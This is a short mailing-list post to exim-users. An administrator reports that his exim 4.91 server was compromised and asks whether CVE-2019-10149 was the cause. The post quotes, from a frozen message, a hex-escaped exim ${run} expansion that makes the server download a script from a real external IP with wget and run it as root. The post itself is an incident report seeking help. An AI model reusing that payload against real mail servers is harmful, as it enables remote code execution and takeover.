Autor: Calum Mackay Data: A: exim-users Assumpte: [exim] just been hacked, could be CVE-2019-10149?
hi all,
My mail system has just been hacked; it's running Debian unstable exim
4.91-9
Could it be CVE-2019-10149? I don't see any reports of active exploits yet.
The reasons I suspect exim involvement:
• starting today, every 5 mins getting frozen messages:
The following address(es) have yet to be delivered:
root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2efabyfmnp\x20\x26\x26\x20sh\x20\x2froot\x2f\x2efabyfmnp\x20\x2dn\x22\x20\x26}}@xxx:
Too many "Received" headers - suspected mail loop
• the trojan horse scripts, that were successfully installed on my
system, with root access, are all group Debian-exim
Luckily, it looks like the trojans did nothing more than repeated
attempts to open up my ssh server to root logins, which I think (and
hope) didn't actually work, so I may have been lucky, and the damage
isn't widespread.